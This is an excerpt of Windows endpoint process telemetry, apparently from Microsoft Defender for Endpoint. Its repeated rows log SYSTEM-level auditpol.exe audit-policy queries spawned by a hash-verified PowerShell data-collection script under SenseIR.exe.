+601,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.372567800+00:00,11128,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9239-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.399505700+00:00,2021-06-24 01:27:35.635894300+00:00,70af7059-b0b4-4578-b7d0-a28eda684db4,computerpii_0a470890c60768167990033d701e7bd881398861,172078,False,10.7740.19041.1052,False,11540474045175659,,11540474045175700,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+602,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.386847900+00:00,7244,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9237-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.401019800+00:00,2021-06-24 01:27:35.635987200+00:00,a9e68e81-438b-40e5-a860-6f92d3050388,computerpii_0a470890c60768167990033d701e7bd881398861,172079,False,10.7740.19041.1052,False,11540474045175659,,11540474045175701,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+603,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.401017900+00:00,14376,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9235-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.420742200+00:00,2021-06-24 01:27:35.636084700+00:00,81b82f42-d1b0-4756-988c-08d4895b3d4d,computerpii_0a470890c60768167990033d701e7bd881398861,172080,False,10.7740.19041.1052,False,11540474045175659,,11540474045175702,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+604,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.420931300+00:00,9964,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9248-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.450762300+00:00,2021-06-24 01:27:35.636185700+00:00,ead0c519-c8b7-4473-b2f1-53ddd9431ad6,computerpii_0a470890c60768167990033d701e7bd881398861,172081,False,10.7740.19041.1052,False,11540474045175659,,11540474045175703,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+605,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.436305600+00:00,15464,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce922b-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.452337400+00:00,2021-06-24 01:27:35.636277400+00:00,d3195876-24a6-4d7a-b8aa-2115c44449c0,computerpii_0a470890c60768167990033d701e7bd881398861,172082,False,10.7740.19041.1052,False,11540474045175659,,11540474045175704,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+606,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.452260800+00:00,4520,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9217-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.466408800+00:00,2021-06-24 01:27:35.636373500+00:00,5e396cd5-5a14-4e03-9569-ecd74d58703d,computerpii_0a470890c60768167990033d701e7bd881398861,172083,False,10.7740.19041.1052,False,11540474045175659,,11540474045175705,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+607,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.467026600+00:00,17856,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9249-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.492374200+00:00,2021-06-24 01:27:35.636503300+00:00,5a88a610-2f42-4588-b272-166f2332f35b,computerpii_0a470890c60768167990033d701e7bd881398861,172084,False,10.7740.19041.1052,False,11540474045175659,,11540474045175706,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+608,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.480222800+00:00,10476,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9216-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.494264100+00:00,2021-06-24 01:27:35.636598600+00:00,71734c99-eab9-494e-899a-fde16f4ac88a,computerpii_0a470890c60768167990033d701e7bd881398861,172085,False,10.7740.19041.1052,False,11540474045175659,,11540474045175707,2021-06-24 01:25:52.287215900+00:00,6672,2021-06-24 01:25:52.287215900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,6672,2176,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,auditpol,AUDITPOL.EXE,Audit Policy Program
+609,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:26:01.494281800+00:00,15316,auditpol.exe,"""auditpol.exe"" /get /subcategory:{0cce9215-69ae-11d9-bed3-505054503030} /r",PortableExecutable,2020-10-09 20:47:54.265073800+00:00,C:\Windows\System32\auditpol.exe,41984,0cbbb1ffe1af93272d498fb8fbbffcc6,d1c6ec7f394b59d067dfd47a6a65978e4c2cc73437457a4b78209e5f516471cc,e6a50645a361d5c763802ffa6e3c749fb81e96d7,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:25:52.287215900+00:00,6672,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '9c478c54876bdf42dc4cfd9c96683cae55563e9fb457fad8b10c4c90a8d90567')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-24 01:25:22.168891200+00:00,11584,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:26:01.509784100+00:00,2021-06-24 